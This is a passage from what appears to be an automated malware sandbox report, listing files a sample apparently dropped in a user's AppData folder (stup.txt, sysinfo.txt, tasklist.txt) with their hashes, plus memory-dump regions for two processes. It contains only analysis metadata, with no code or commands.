5611a30e8fac27a309948c5c9632c31f2f7a711bbc87e422cbf59df5846cc8fa

SHA512
5b580de01cd5be9ba04ec38535016c74ba4794eaa69e848e8b7e5ddee989c2e8d2c57387df4ff2e8657620abceab804e6d8f9f6eb426f68599d3d354773e5c19

Download Submit
C:\Users\Admin\AppData\Roaming\stup.txt
Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Users\Admin\AppData\Roaming\sysinfo.txt
Filesize
2KB

MD5
b8b2a13e79ff912cd5f4594b2e82c9cb

SHA1
dfbf508893252351eebd38567a8240bc1d1c54f3

SHA256
47de6d4a691e223d01418ca108924786a368ae578f065f2416ec5eb78b0554d0

SHA512
12c417a1f25ca95a1c354acff5a7a3856535fdbdd2582233f3d8074c630fede4541b96ae677aac5ff16f5b59cb3e9ef5c3409c1929cbcb482e25e81542d2a700

Download Submit
C:\Users\Admin\AppData\Roaming\tasklist.txt
Filesize
7KB

MD5
cd32ba6e374f5fe550569c4649162fd9

SHA1
d377ecf64a2a8b7d786c297d542809c5ec33c0bd

SHA256
965d8cec6a4e78a280bdf44770b98f08ba145ce95b3c1d33ff835be6a04f3374

SHA512
5c1d2a719ed20009edeab92d93a741ce57f4df8f60e4e346f24bfa7b27345531e94ebdad1b296a2703af8821cd0ff47c28dcc2e4f1a0e55cbadbde4354e3ee6b

Download Submit
memory/1316-12-0x00000181265F0000-0x0000018126600000-memory.dmp

Filesize
64KB

Download
memory/1316-15-0x00007FFCE3080000-0x00007FFCE3B41000-memory.dmp

Filesize
10.8MB

Download
memory/1316-11-0x00000181265F0000-0x0000018126600000-memory.dmp

Filesize
64KB

Download
memory/1316-10-0x00007FFCE3080000-0x00007FFCE3B41000-memory.dmp

Filesize
10.8MB

Download
memory/1316-9-0x0000018126560000-0x0000018126582000-memory.dmp

Filesize
136KB

Download
memory/5084-29-0x000001EDC7140000-0x000001EDC7302000-memory.dmp

Filesize
1.8MB

Download
memory/5084-31-0x00007FFCE3080000-0x00007FFCE3B41000-memory.dmp

Filesize
10.8MB

Download
memory/5084-27-0x00007FFCE3080000-0x00007FFCE3B41000-memory.dmp

Filesize
10.8MB

Download
memory/5084-28-0x000001EDC6080000-0x000001EDC6090000-memory.dmp

Filesize
64KB

Download